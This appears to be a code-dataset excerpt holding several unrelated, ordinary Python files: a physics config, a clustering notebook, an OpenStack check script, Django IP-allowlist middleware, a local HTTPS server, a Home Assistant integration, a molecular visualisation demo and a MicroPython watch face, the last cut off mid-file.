content stringlengths 5 1.05M |
|---|
import FWCore.ParameterSet.Config as cms
esDigiToRaw = cms.EDProducer("ESDigiToRaw",
debugMode = cms.untracked.bool(False),
InstanceES = cms.string(''),
Label = cms.string('simEcalPreshowerDigis'),
LookupTable = cms.untracked.FileInPath('EventFilter/ESDigiToRaw/data/ES_lookup_table.dat')
)
# bypass zero suppression
from Configuration.ProcessModifiers.premix_stage1_cff import premix_stage1
premix_stage1.toModify(esDigiToRaw, Label = 'mix')
|
#!/usr/bin/env python
# coding: utf-8
# <a href="https://colab.research.google.com/github/korymath/public_notebooks/blob/master/Building_Equal_Size_Clusters_Kyle_Mathewson_Sept_2019.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# # Imports
# In[1]:
# get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
import numpy as np
from sklearn.datasets.samples_generator import make_blobs
from sklearn.cluster import KMeans
from collections import Counter
import numpy as np
from scipy.spatial.distance import pdist
from scipy.spatial.distance import squareform
random_state = 1017
# # Generate and Visualize Data
# In[2]:
n_samples = 6
n_groups = 3
n_members = 2
# ensure that the calculus works out
assert n_groups * n_members == n_samples
X, y_true = make_blobs(n_samples=n_samples, centers=n_groups,
cluster_std=0.50, random_state=random_state)
plt.scatter(X[:, 0], X[:, 1], s=50);
# In[3]:
for x in X:
print('{};'.format(x))
# # K-Means Clustering
# In[4]:
kmeans = KMeans(n_clusters=n_groups, n_init=100, max_iter=1000)
kmeans.fit(X)
labels = kmeans.predict(X)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='viridis')
centers = kmeans.cluster_centers_
plt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5);
# In[5]:
# test the group size, AssertionError on failure
C = Counter(labels)
print('Group sizes: {}'.format(C))
try:
assert list(C.values()) == [n_members] * n_groups
except AssertionError as e:
print('Unequal group sizes')
# # (optional) Explicit Algorithm Details
# In[6]:
from sklearn.metrics import pairwise_distances_argmin
def find_clusters(X, n_groups, rseed=random_state):
# 1. Randomly choose clusters
rng = np.random.RandomState(rseed)
i = rng.permutation(X.shape[0])[:n_groups]
centers = X[i]
while True:
# 2a. Assign labels based on closest center
labels = pairwise_distances_argmin(X, centers)
# 2b. Find new centers from means of points
new_centers = np.array([X[labels == i].mean(0)
for i in range(n_groups)])
# 2c. Check for convergence
if np.all(centers == new_centers):
break
centers = new_centers
return centers, labels
centers, labels = find_clusters(X=X, n_groups=n_groups)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='viridis');
# # Limitations of K-Means
#
# 1. Global optimum not guaranteed
# 2. n_groups must be selected beforehand
# 3. limited to linear cluster boundaries
# 4. slow for large n_samples
# 5. group sizes unequal
# In[7]:
# To address limitation 1, we can increase n_init for different random
# starting points on centroids. We can also increase the number of iterations
# particularly if there is a small n_samples
# To address limitation 3, we can use spectral clustering
# use a kernel transformation to project the data into a higher dimension where
# a linear separation is possible.
# Allow k-means to discover non-linear boundaries.
from sklearn.cluster import SpectralClustering
model = SpectralClustering(n_clusters=n_groups, affinity='nearest_neighbors',
assign_labels='kmeans', n_neighbors=n_members,
n_init=100, random_state=random_state)
labels = model.fit_predict(X)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='viridis');
# In[8]:
# test the group size, AssertionError on failure
C = Counter(labels)
print('Group sizes: {}'.format(C))
try:
assert list(C.values()) == [n_members] * n_groups
except AssertionError as e:
print('Unequal group sizes')
# # Contrained Group Size k-means Clustering
# In[9]:
def average_data_distance_error(n_groups, memberships, distances):
'''Calculate average distance between data in clusters.'''
error = 0
for k in range(n_groups):
# indices of datapoints belonging to class k
i = np.where(memberships == k)[0]
error += np.mean(distances[tuple(np.meshgrid(i, i))])
return error / n_groups
def cluster_equal_groups(data, n_groups=None, n_members=None, verbose=False):
# equal-size clustering based on data exchanges between pairs of clusters
# given two of three num_points, num_clusters, group_size
# the third is trivial to calculate
n_samples, _ = data.shape
if n_members is None and n_groups is not None:
n_members = n_samples // n_groups
elif n_groups is None and n_members is not None:
n_groups = n_samples // n_members
else:
raise Exception('must specify either n_members or n_groups')
# distance matrix
distances = squareform(pdist(data))
# print(distances)
# Random initial membership
# np.random.seed(random_state)
# memberships = np.random.permutation(n_samples) % n_groups
# Initial membership
kmeans = KMeans(n_clusters=n_groups, n_init=100, max_iter=1000)
kmeans.fit(data)
memberships = kmeans.predict(data)
current_err = average_data_distance_error(n_groups, memberships, distances)
# print(n_groups, memberships)
t = 1
while True:
past_err = current_err
for a in range(n_samples):
for b in range(a):
# exchange membership
memberships[a], memberships[b] = memberships[b], memberships[a]
# calculate new error
test_err = average_data_distance_error(n_groups, memberships, distances)
if verbose:
print("{}: {}<->{} E={}".format(t, a, b, current_err))
if test_err < current_err:
current_err = test_err
else:
# put them back
memberships[a], memberships[b] = memberships[b], memberships[a]
if past_err == current_err:
break
t += 1
return memberships
# In[10]:
import time
n_samples = 32
n_groups = 8
n_members = n_samples // n_groups
# ensure that the calculus works out
assert n_groups * n_members == n_samples
X, y_true = make_blobs(n_samples=n_samples,
centers=n_groups,
cluster_std=0.50,
random_state=random_state)
plt.scatter(X[:, 0], X[:, 1], s=50);
t0 = time.time()
labels = cluster_equal_groups(X, n_groups=n_groups, verbose=False)
t1 = time.time()
# test the group size, AssertionError on failure
C = Counter(labels)
print('Group sizes: {}'.format(C))
try:
assert list(C.values()) == [n_members] * n_groups
print('Success, group sizes are equal!')
except AssertionError as e:
print('Unequal group sizes')
print('Equal group memberships found in {} s'.format(round(t1-t0, 2)))
# Plot the memberships
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='viridis');
# In[14]:
nx, ny = 4, 8
xs = np.linspace(0, 1, nx)
ys = np.linspace(0, 1, ny)
x, y = np.meshgrid(xs, ys) + np.random.normal(scale=0.01, size=(ny, nx))
print(x.shape, y.shape)
# In[15]:
X = np.zeros(shape=(len(x.flatten()), 2))
X[:, 0] = x.flatten()
X[:, 1] = y.flatten()
plt.scatter(X[:, 0], X[:, 1], s=50);
# In[16]:
labels = cluster_equal_groups(X, n_groups=n_groups, verbose=False)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='jet');
# test the group size, AssertionError on failure
C = Counter(labels)
print('Group sizes: {}'.format(C))
try:
assert list(C.values()) == [n_members] * n_groups
except AssertionError as e:
print('Unequal group sizes')
# In[17]:
# This import registers the 3D projection, but is otherwise unused.
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
X, y_true = make_blobs(n_samples=n_samples,
centers=n_groups,
n_features=3,
cluster_std=0.50,
random_state=random_state)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(X[:, 0], X[:, 1], X[:, 2], s=50)
# In[18]:
labels = cluster_equal_groups(X, n_groups=n_groups)
# In[19]:
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=labels, s=50, cmap='viridis');
# In[20]:
np.random.permutation(n_samples) % 4
# In[21]:
distances = squareform(pdist(X))
distances
# In[22]:
distances[np.meshgrid((0,1), (0,1))]
# In[23]:
np.mean(distances[tuple(np.meshgrid([0,1], [0,1]))])
# In[24]:
distances[tuple(np.meshgrid([2,3], [2,3]))]
# In[25]:
np.meshgrid([1,2,3],[1,2,3])
# distances[tuple(np.meshgrid([1,2,3],[1,2,3]))]
# In[26]:
memberships = np.random.permutation(n_samples) % n_groups
np.where(memberships == 3)[0]
# In[27]:
tuple(np.meshgrid([1,2,3], [1,2,3])[0])
# In[28]:
distances[np.meshgrid([1,2,3], [1,2,3])]
# In[30]:
X
# In[31]:
n_samples = 128
n_groups = 16
n_members = 8
# ensure that the calculus works out
assert n_groups * n_members == n_samples
X, y_true = make_blobs(n_samples=n_samples, centers=n_groups,
cluster_std=0.50, random_state=random_state)
plt.scatter(X[:, 0], X[:, 1], s=50);
|
#!/usr/bin/python
from prettytable import PrettyTable
from nova import compute
from nova import objects
from nova import servicegroup
from nova.context import RequestContext
import nova.scheduler.host_manager as host_manager
from nova.objects import resource_provider as rp_obj
from nova import config
import sys
color_tbl = {
"grey": '\033[1;30m',
"green" :'\033[32m',
"blue" : '\033[34m',
"yellow" :'\033[33m',
"red" : '\033[31m',
}
def colorizer(num):
if num <= 20:
return "%s%.2f%%\033[0m" % (color_tbl['grey'], num)
if num <= 40:
return "%s%.2f%%\033[0m" % (color_tbl['green'], num)
if num <= 60:
return "%s%.2f%%\033[0m" % (color_tbl['blue'], num)
if num <= 80:
return "%s%.2f%%\033[0m" % (color_tbl['yellow'], num)
return "%s%.2f%%\033[0m" % (color_tbl['red'], num)
config.parse_args(sys.argv)
cxt = RequestContext()
host_manager.objects.register_all()
def check_services():
objects.register_all()
host_api = compute.HostAPI()
servicegroup_api = servicegroup.API()
api_services = ('nova-osapi_compute', 'nova-ec2', 'nova-metadata')
isOK = True
print "============================ services check ============================"
for s in host_api.service_get_all(cxt, set_zones=True, all_cells=True):
if s['binary'] in api_services:
continue
if not servicegroup_api.service_is_up(s):
isOK = False
print "%s %s is down" % (s['host'], s['binary'])
if s['disabled']:
isOK = False
print "%s %s is disabled" % (s['host'], s['binary'])
if isOK:
print "Service is OK"
def print_hypervisor_view():
hm = host_manager.HostManager()
tbl = PrettyTable(["hostname", "nodename", "updated","ip", "cpu", "cpu_ratio",
"ram", "ram_ratio", "vms", "active_vms", "other_vms"])
tbl.align['hostname'] = 'l'
tbl.align['ip'] = 'l'
states = hm.get_all_host_states(cxt)
for i in states:
cpu = "%s/%s" % (i.vcpus_used, i.vcpus_total)
vcpus_total = i.vcpus_total or i.vcpus_used
if vcpus_total:
cpu_ratio = colorizer(i.vcpus_used * 100.0 / (vcpus_total * i.cpu_allocation_ratio))
else:
cpu_ratio = '-'
ram_used = i.total_usable_ram_mb - i.free_ram_mb
ram = "%s/%s" % (ram_used, i.total_usable_ram_mb)
total_usable_ram_mb = i.total_usable_ram_mb or ram_used
if total_usable_ram_mb:
ram_ratio = colorizer(ram_used * 100.0 / (total_usable_ram_mb * i.ram_allocation_ratio))
else:
ram_ratio = '-'
disk_used = i.disk_mb_used/1024.0
num_instances = 0
if 'num_instances' in i.stats:
num_instances = i.stats['num_instances']
num_vm_active = 0
if 'num_vm_active' in i.stats:
num_vm_active = i.stats['num_vm_active']
num_vm_others = int(num_instances) - int(num_vm_active)
tbl.add_row([i.host, i.nodename, i.updated, i.host_ip,
cpu, cpu_ratio,
ram, ram_ratio,
num_instances, num_vm_active, num_vm_others])
print "============================ Hypervisor resource ============================"
print tbl.get_string(sortby="ip")
def alloction_check():
print "============================ alloction check ============================"
tbl = PrettyTable(["status", "hostname", "nodename", "vm_in_nodes","vm_in_allocations"])
tbl.align['hostname'] = 'l'
tbl.align['nodename'] = 'l'
hm = host_manager.HostManager()
states = hm.get_all_host_states(cxt)
node_vm_map = {}
for i in states:
rp = rp_obj.ResourceProvider.get_by_uuid(cxt, i.uuid)
node_vm_map.setdefault(rp.name, set())
for j in i.instances:
#Note(fanzhang): j should one Instance object which means instance on node.
inst = i.instances[j]
node_name = inst.node
node_vm_map.setdefault(node_name, set())
node_vm_map[node_name].add(inst.uuid)
db_allocs = rp_obj._get_allocations_by_provider_id(cxt, rp.id)
vms_in_allocation = set()
for j in db_allocs:
vms_in_allocation.add(j['consumer_id'])
vm_in_nodes = node_vm_map[rp.name]
#msg = "%s(%s, %s)\033[0m: vm in nodes: %s <-> vm in allocations: %s"
if vm_in_nodes == vms_in_allocation:
hint = "%s%s\033[0m" % (color_tbl['green'], 'OK')
hostname = "%s%s\033[0m" % (color_tbl['blue'], i.host)
nodename = "%s%s\033[0m" % (color_tbl['yellow'], i.nodename)
#print msg % (color_tbl['green'], i.host, i.nodename, len(vm_in_nodes), len(vms_in_allocation))
else:
hint = "%s%s\033[0m" % (color_tbl['red'], 'X')
hostname = "%s%s\033[0m" % (color_tbl['red'], i.host)
nodename = "%s%s\033[0m" % (color_tbl['red'], i.nodename)
#print msg % (color_tbl['red'], i.host, i.nodename, len(vm_in_nodes), len(vms_in_allocation))
#print vms_in_allocation - vm_in_nodes
#print vm_in_nodes - vms_in_allocation
tbl.add_row([hint, hostname, nodename, len(vm_in_nodes), len(vms_in_allocation)])
print tbl.get_string(sortby='hostname')
check_services()
print_hypervisor_view()
alloction_check()
|
from django.http import HttpResponseRedirect
from django.conf import settings
from django.http import Http404
import re
from ipaddress import ip_address
from ipaddress import ip_network
TRUSTED_URLS = getattr(settings, 'TRUSTED_URLS', [])
TRUSTED_IPS = getattr(settings, 'TRUSTED_IPS', ['127.0.0.1/32'])
class IPAddressList(list):
def __init__(self, *ips):
super().__init__()
self.extend([ip_network(ip) for ip in ips])
def __contains__(self, address):
ip = ip_address(address)
return any(ip in net for net in self)
class PermissionsMiddleware(object):
def process_request(self, request):
if request.user.is_superuser:
if request.path.startswith('/users/'):
return HttpResponseRedirect(request.path.replace('/users/', '/staff/'))
else:
if request.path.startswith('/staff/'):
return HttpResponseRedirect(request.path.replace('/staff/', '/users/'))
def get_client_address(request):
depth = getattr(settings, 'TRUSTED_PROXIES', 2)
if 'HTTP_X_FORWARDED_FOR' in request.META:
header = request.META['HTTP_X_FORWARDED_FOR']
levels = [x.strip() for x in header.split(',')]
if len(levels) >= depth:
address = ip_address(levels[-depth])
else:
address = None
else:
address = ip_address(request.META['REMOTE_ADDR'])
return address and address.exploded or address
class TrustedAccessMiddleware(object):
"""
Middleware to prevent access to the admin if the user IP
isn't in the TRUSTED_IPS setting.
"""
def process_request(self, request):
client_address = get_client_address(request)
if any(re.match(addr, request.path) for addr in TRUSTED_URLS):
trusted_addresses = IPAddressList(*TRUSTED_IPS)
if client_address not in trusted_addresses:
raise Http404()
def process_template_response(self, request, response):
client_address = get_client_address(request)
if any(re.match(addr, request.path) for addr in TRUSTED_URLS):
trusted_addresses = IPAddressList(*TRUSTED_IPS)
if response.context_data:
response.context_data['internal_request'] = (client_address in trusted_addresses)
return response
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Webkit HTTPS Server with CORS
# (c) 2017-2019 Radu.I
uxmScriptVersion = 'v.20190710.1159'
import BaseHTTPServer, SimpleHTTPServer
import ssl
import os, sys, signal
if sys.argv[1:]:
port = int(sys.argv[1])
else:
port = 4443
web_dir = os.path.join(os.path.dirname(__file__), 'web')
os.chdir(web_dir)
class CORSHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def end_headers(self):
self.send_my_headers()
SimpleHTTPServer.SimpleHTTPRequestHandler.end_headers(self)
def send_my_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
requestHandler = CORSHTTPRequestHandler
#requestHandler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = BaseHTTPServer.HTTPServer(('localhost', port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='../cert.pem', server_side=True)
#httpd.serve_forever()
# A custom signal handle to allow us to Ctrl-C out of the process
def signal_handler(signal, frame):
print('Exiting HTTPS server (Ctrl+C pressed)')
try:
if(httpd):
httpd.server_close()
finally:
sys.exit(0)
# Install the keyboard interrupt handler
signal.signal(signal.SIGINT, signal_handler)
# Now loop forever
try:
print('Starting HTTPS Server.Py (' + uxmScriptVersion + ') on localhost:' + str(port) + ' (press Ctrl+C to Stop ...)')
while True:
sys.stdout.flush()
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
#END
|
"""Defines services that Hue Sync Box component supports."""
import logging
import voluptuous
from homeassistant.helpers import config_validation
from homeassistant.helpers import service
from . import const
_LOGGER = logging.getLogger(__name__)
GET_ACCESS_TOKEN_SCHEMA = config_validation.make_entity_service_schema({})
SET_AREA_SCHEMA = config_validation.make_entity_service_schema({
voluptuous.Required(const.ATTR_AREA_NAME): config_validation.string,
})
SET_BRIGHTNESS_SCHEMA = config_validation.make_entity_service_schema({
voluptuous.Required(const.ATTR_BRIGHTNESS): config_validation.positive_int,
})
SET_HDMI_INPUT_SCHEMA = config_validation.make_entity_service_schema({
voluptuous.Required(const.ATTR_HDMI_INPUT): config_validation.string,
})
SET_INTENSITY_SCHEMA = config_validation.make_entity_service_schema({
voluptuous.Required(const.ATTR_INTENSITY): config_validation.string,
voluptuous.Optional(const.ATTR_SYNC_MODE): config_validation.string,
})
SET_SYNC_MODE_SCHEMA = config_validation.make_entity_service_schema({
voluptuous.Required(const.ATTR_SYNC_MODE): config_validation.string,
})
def register_services(hass):
"""Registers custom services for hue_sync_box."""
_LOGGER.debug('Registering services for Hue Sync Box.')
get_access_token_service = create_get_access_token_service(hass)
hass.services.async_register(
const.DOMAIN,
const.SERVICE_GET_ACCESS_TOKEN,
get_access_token_service,
schema=GET_ACCESS_TOKEN_SCHEMA,
)
set_area_service = create_set_area(hass)
hass.services.async_register(
const.DOMAIN,
const.SERVICE_SET_AREA,
set_area_service,
schema=SET_AREA_SCHEMA,
)
set_brightness_service = create_get_access_token_service(hass)
hass.services.async_register(
const.DOMAIN,
const.SERVICE_SET_BRIGHTNESS,
set_brightness_service,
schema=SET_BRIGHTNESS_SCHEMA,
)
set_hdmi_input_service = create_set_hdmi_input_service(hass)
hass.services.async_register(
const.DOMAIN,
const.SERVICE_SET_HDMI_INPUT,
set_hdmi_input_service,
schema=SET_HDMI_INPUT_SCHEMA,
)
set_intensity_service = create_set_intensity_service(hass)
hass.services.async_register(
const.DOMAIN,
const.SERVICE_SET_INTENSITY,
set_intensity_service,
schema=SET_INTENSITY_SCHEMA,
)
sync_mode_service = create_set_sync_mode_service(hass)
hass.services.async_register(
const.DOMAIN,
const.SERVICE_SET_SYNC_MODE,
sync_mode_service,
schema=SET_SYNC_MODE_SCHEMA,
)
def unregister_services(hass):
"""Unregisters custom services from hue_sync_box."""
hass.services.async_remove(const.DOMAIN, const.SERVICE_GET_ACCESS_TOKEN)
hass.services.async_remove(const.DOMAIN, const.SERVICE_SET_AREA)
hass.services.async_remove(const.DOMAIN, const.SERVICE_SET_BRIGHTNESS)
hass.services.async_remove(const.DOMAIN, const.SERVICE_SET_HDMI_INPUT)
hass.services.async_remove(const.DOMAIN, const.SERVICE_SET_INTENSITY)
hass.services.async_remove(const.DOMAIN, const.SERVICE_SET_SYNC_MODE)
def create_get_access_token_service(hass):
"""Returns service for get_access_token."""
async def async_get_access_token(call):
_LOGGER.debug(
f'hue_syc_box async_get_access_token handler called '
f'with data: {call.data}.')
entity_ids = call.data.get(const.ATTR_ENTITY_ID)
for entity_id in entity_ids:
entity = hass.data[const.DOMAIN].get(entity_id)
if entity_id:
await entity.async_get_access_token()
return async_get_access_token
def create_set_area(hass):
"""Returns service for set_area."""
async def async_set_area(call):
_LOGGER.debug(
f'hue_syc_box async_set_area handler called '
f'with data: {call.data}.')
entity_ids = call.data.get(const.ATTR_ENTITY_ID)
area_name = call.data.get(const.ATTR_AREA_NAME)
for entity_id in entity_ids:
entity = hass.data[const.DOMAIN].get(entity_id)
if entity_id:
await entity.async_set_area(area_name)
return async_set_area
def create_set_brightness(hass):
"""Returns service for set_brightness."""
async def async_set_brightness(call):
_LOGGER.debug(
f'hue_syc_box async_set_brightness handler called '
f'with data: {call.data}.')
entity_ids = call.data.get(const.ATTR_ENTITY_ID)
brightness = call.data.get(const.ATTR_BRIGHTNESS)
for entity_id in entity_ids:
entity = hass.data[const.DOMAIN].get(entity_id)
if entity_id:
await entity.async_set_brightness(brightness)
return async_set_brightness
def create_set_hdmi_input_service(hass):
"""Returns service for set_hdmi_input."""
async def async_set_hdmi_input(call):
_LOGGER.debug(
f'hue_syc_box create_set_hdmi_input_service handler called '
f'with data: {call.data}.')
entity_ids = call.data.get(const.ATTR_ENTITY_ID)
hdmi_input = call.data.get(const.ATTR_HDMI_INPUT)
for entity_id in entity_ids:
entity = hass.data[const.DOMAIN].get(entity_id)
if entity_id:
await entity.async_set_hdmi_input(hdmi_input)
return async_set_hdmi_input
def create_set_intensity_service(hass):
"""Returns service for set_intensity."""
async def async_set_intensity(call):
_LOGGER.debug(
f'hue_syc_box async_set_intensity handler called '
f'with data: {call.data}.')
entity_ids = call.data.get(const.ATTR_ENTITY_ID)
intensity = call.data.get(const.ATTR_INTENSITY)
sync_mode = call.data.get(const.ATTR_SYNC_MODE)
for entity_id in entity_ids:
entity = hass.data[const.DOMAIN].get(entity_id)
if entity_id:
await entity.async_set_intensity(intensity, sync_mode)
return async_set_intensity
def create_set_sync_mode_service(hass):
"""Returns service for set_sync_mode."""
async def async_set_sync_mode(call):
_LOGGER.debug(
f'hue_syc_box async_set_sync_mode handler called '
f'with data: {call.data}.')
entity_ids = call.data.get(const.ATTR_ENTITY_ID)
sync_mode = call.data.get(const.ATTR_SYNC_MODE)
for entity_id in entity_ids:
entity = hass.data[const.DOMAIN].get(entity_id)
if entity_id:
await entity.async_set_sync_mode(sync_mode)
return async_set_sync_mode
|
"""
======================================================================
Molecular Module Demo
======================================================================
A small example to show how to use the various molecular
representations present in the `molecular` module to visualize
proteins. This example also shows how to parse PDB files to obtain
atomic info essential for constructing the representations.
Importing necessary modules
"""
import urllib
import os
from fury import window, actor, ui, molecular as mol
import numpy as np
###############################################################################
# Downloading the PDB file of the protein to be rendered.
# User can change the pdb_code depending on which protein they want to
# visualize.
pdb_code = '4kb2'
downloadurl = "https://files.rcsb.org/download/"
pdbfn = pdb_code + ".pdb"
flag = 0
if not os.path.isfile(pdbfn):
flag = 1
url = downloadurl + pdbfn
outfnm = os.path.join(pdbfn)
try:
urllib.request.urlretrieve(url, outfnm)
except Exception:
print("Error in downloading the file!")
###############################################################################
# creating a PeriodicTable() object to obtain atomic numbers from names of
# elements
table = mol.PeriodicTable()
###############################################################################
# Creating empty lists which will be filled with atomic information as we
# parse the pdb file.
NumberOfAtoms = 0
points = []
elements = []
atom_names = []
model = []
sheets = []
helix = []
residue_seq = []
chain = []
is_hetatm = []
current_model_number = 1
###############################################################################
# Parsing the pdb file for information about coordinates and atoms
pdbfile = open(pdbfn, 'r')
pdb_lines = pdbfile.readlines()
for line in pdb_lines:
line = line.split()
try:
if line[0] == 'ATOM' or line[0] == 'HETATM':
if line[-1] != 'H':
coorX, coorY, coorZ = float(line[6]), float(line[7]), \
float(line[8])
resi = line[5]
current_chain = ord(line[4])
points += [[coorX, coorY, coorZ]]
residue_seq += [resi]
chain += [current_chain]
elements += [table.atomic_number(line[-1])]
atom_names += [line[2]]
model += [current_model_number]
NumberOfAtoms += 1
if(line[0] == 'HETATM'):
is_hetatm += [True]
else:
is_hetatm += [False]
if line[0] == 'SHEET':
start_chain = ord(line[5])
start_resi = int(line[6])
end_chain = ord(line[8])
end_resi = int(line[9])
r = [start_chain, start_resi, end_chain, end_resi]
sheets += [r]
if line[0] == 'HELIX':
start_chain = ord(line[4])
start_resi = int(line[5])
end_chain = ord(line[7])
end_resi = int(line[8])
r = [start_chain, start_resi, end_chain, end_resi]
helix += [r]
except Exception:
continue
points = np.array(points)
residue_seq = np.array(residue_seq, dtype=int)
chain = np.array(chain)
elements = np.array(elements)
atom_names = np.array(atom_names)
model = np.array(model)
sheets = np.array(sheets)
helix = np.array(helix)
is_hetatm = np.array(is_hetatm)
###############################################################################
# Helper function to make the visuals look good by manipulating lighting.
def make_aesthetic(molecule_rep):
molecule_rep.GetProperty().SetAmbient(0.2)
molecule_rep.GetProperty().SetDiffuse(1)
molecule_rep.GetProperty().SetSpecular(1)
molecule_rep.GetProperty().SetSpecularPower(100.0)
###############################################################################
# Doing 3 things here -
# 1. Creating the molecule object.
# 2. Computing the bonding information for the molecule.
# 3. Generating and adding molecular representations to the scene.
molecule = mol.Molecule(elements, points, atom_names, model,
residue_seq, chain, sheets, helix, is_hetatm)
# print(np.unique(elements))
mol.compute_bonding(molecule)
# bounding box
b_box = mol.bounding_box(molecule, colors=(0, 0.8, 1), linewidth=0.4)
# stick representation
stick_rep = mol.stick(molecule, bond_thickness=0.2)
make_aesthetic(stick_rep)
# ribbon representation
ribbon_rep = mol.ribbon(molecule)
make_aesthetic(ribbon_rep)
# ball and stick representation
ball_stick_rep = mol.ball_stick(molecule, atom_scale_factor=0.3,
bond_thickness=0.2)
make_aesthetic(ball_stick_rep)
# sphere representation
vdw_sphere_rep = mol.sphere_cpk(molecule)
make_aesthetic(vdw_sphere_rep)
###############################################################################
# We perform symmetric difference to determine the unchecked options.
# We also define methods to render visibility and color.
# Get difference between two lists.
def sym_diff(l1, l2):
return list(set(l1).symmetric_difference(set(l2)))
# Set Visiblity of the figures
def set_figure_visiblity(checkboxes):
checked = checkboxes.checked_labels
unchecked = sym_diff(list(figure_dict), checked)
for visible in checked:
figure_dict[visible].SetVisibility(True)
if 'Space filling' in visible:
vdw_opacity_line_slider.set_visibility(True)
for invisible in unchecked:
figure_dict[invisible].SetVisibility(False)
if 'Space filling' in invisible:
vdw_opacity_line_slider.set_visibility(False)
figure_dict = {'Bounding box': b_box, 'Ribbon':ribbon_rep,
'Stick': stick_rep, 'Ball and Stick':ball_stick_rep,
'Space filling': vdw_sphere_rep}
all_labels = list(figure_dict)
checked = all_labels[:2]
unchecked = all_labels[2:]
check_box = ui.Checkbox(all_labels, checked, padding=1, font_size=15,
font_family='Arial', position=(20, 30))
check_box.on_change = set_figure_visiblity
vdw_opacity_line_slider = ui.LineSlider2D(initial_value=1, center=(550, 70),
min_value=0, max_value=1,
orientation="Vertical",
text_alignment="Left", length=80,
outer_radius=10, font_size=14,
text_template="Opacity({ratio:.0%}) ")
def change_opacity(slider):
opacity = slider.value
vdw_sphere_rep.GetProperty().SetOpacity(opacity)
for invisible in unchecked:
figure_dict[invisible].SetVisibility(False)
if 'Space filling' == invisible:
vdw_opacity_line_slider.set_visibility(False)
vdw_opacity_line_slider.on_change = change_opacity
###############################################################################
# Dimensions of the output screen
screen_x_dim = 600
screen_y_dim = 600
dims = (screen_x_dim, screen_y_dim)
###############################################################################
# creating a ShowManager object
showm = window.ShowManager(size=dims, title=pdb_code)
tb = ui.TextBlock2D(text=pdb_code.upper(), position=(screen_x_dim/2-40,
screen_y_dim/12), font_size=24, color=(1, 1, 1))
tb.actor.GetTextProperty().SetFontFamilyToCourier()
###############################################################################
# Adding the textblocks, axes and molecular representations to the scene.
showm.scene.reset_clipping_range()
showm.scene.add(tb)
showm.scene.add(actor.axes(scale=(5, 5, 5)))
showm.scene.add(stick_rep)
showm.scene.add(b_box)
showm.scene.add(ball_stick_rep)
showm.scene.add(ribbon_rep)
showm.scene.add(vdw_sphere_rep, vdw_opacity_line_slider)
showm.scene.add(check_box)
###############################################################################
# Delete the PDB file.
flag = 0
if flag:
os.remove(pdbfn)
interactive = True
if interactive:
showm.start()
###############################################################################
# to save a snapshot of the image
window.record(showm.scene, size=dims, out_path='images/4kb2_protein_viz.png')
|
'''
watch.py - Analog Watch Display
Video: https://youtu.be/NItKb6umMc4
'''
import utime
import math
from machine import Pin, SPI
import axp202c
import st7789
def main():
'''
Draw analog watch face and update time
'''
try:
# Turn power on display power
axp = axp202c.PMU()
axp.enablePower(axp202c.AXP202_LDO2)
# initialize spi port
spi = SPI(
1,
baudrate=32000000,
sck=Pin(18, Pin.OUT),
mosi=Pin(19, Pin.OUT))
# configure display
tft = st7789.ST7789(
spi,
240,
240,
cs=Pin(5, Pin.OUT),
dc=Pin(27, Pin.OUT),
backlight=Pin(12, Pin.OUT),
rotation=2)
# enable display
tft.init()
# draw the watch face background
tft.jpg("face.jpg", 0, 0, st7789.SLOW)
# define the polygons for the hour, minute and second hands
# polygons must be closed convex polygons or bad things(tm) happen.
second_poly = [
(3, 1), (1, 3), (1, 72), (3, 75), (6, 72), (6, 3), (4, 1), (3, 1)]
minute_poly = [
(5, 1), (1, 8), (1, 72), (5, 75), (10, 72), (10, 8), (6, 1), (5, 1)]
hour_poly = [
(7, 1), (1, 8), (1, 62), (7, 65), (14, 62), (14, 8), (10, 1), (7, 1)]
# constants for calculating hand angles.
pi_div_6 = math.pi/6
pi_div_30 = math.pi/30
pi_div_360 = math.pi/360
pi_div_1800 = math.pi/1800
pi_div_2160 = math.pi/2160
# initialize variables for the bounding rectangles for the
# hour, minute and second hands. Calling bounding with True will
# reset the bounds, calling with False will disable bounding
tft.bounding(True)
hour_bound = tft.bounding(True)
minute_bound = tft.bounding(True)
second_bound = tft.bounding(True)
while True:
# save the current time in seconds so we can determine when
# when to update the display.
last = utime.time()
# get the current hour, minute and second
_, _, _, hour, minute, second, _, _ = utime.localtime()
# constrain hours to 12 hour time
hour %= 12
# calculate the angle of the hour hand in radians
hour_ang = (
(hour * pi_div_6) +
(minute * pi_div_360) +
(second * pi_div_2160))
# calculate the angle of the minute hand in radians
minute_ang = ((minute*pi_div_30)+(second*pi_div_1800))
# calculate the angle of the second hand on radians
second_ang = (second*pi_div_30)
# erase the bounding area of the last drawn hour hand
x1, y1, x2, y2 = hour_bound
tft.fill_rect(x1, y1, x2-x1+1, y2-y1+1, st7789.WHITE)
# erase the bounding area of the last drawn minute hand
x1, y1, x2, y2 = minute_bound
tft.fill_rect(x1, y1, x2-x1+1, y2-y1+1, st7789.WHITE)
# erase the bounding area of the last drawn second hand
x1, y1, x2, y2 = second_bound
tft.fill_rect(x1, y1, x2-x1+1, y2-y1+1, st7789.WHITE)
tft.bounding(True) # clear bounding rectangle
# draw and fill the hour hand polygon rotated to hour_ang
tft.fill_polygon(
hour_poly,
112, # 119-7 (half polygon_width)
59, # 119-60 (polygon_height - tail)
st7789.BLACK,
hour_ang,
7, # center of
60) # polygon rotaton
# get the bounding rectangle of the hour_polygon as drawn and
# reset the bounding box for the next polygon
hour_bound = tft.bounding(True)
# draw and fill the minute hand polygon rotated to minute_ang
tft.fill_polygon(
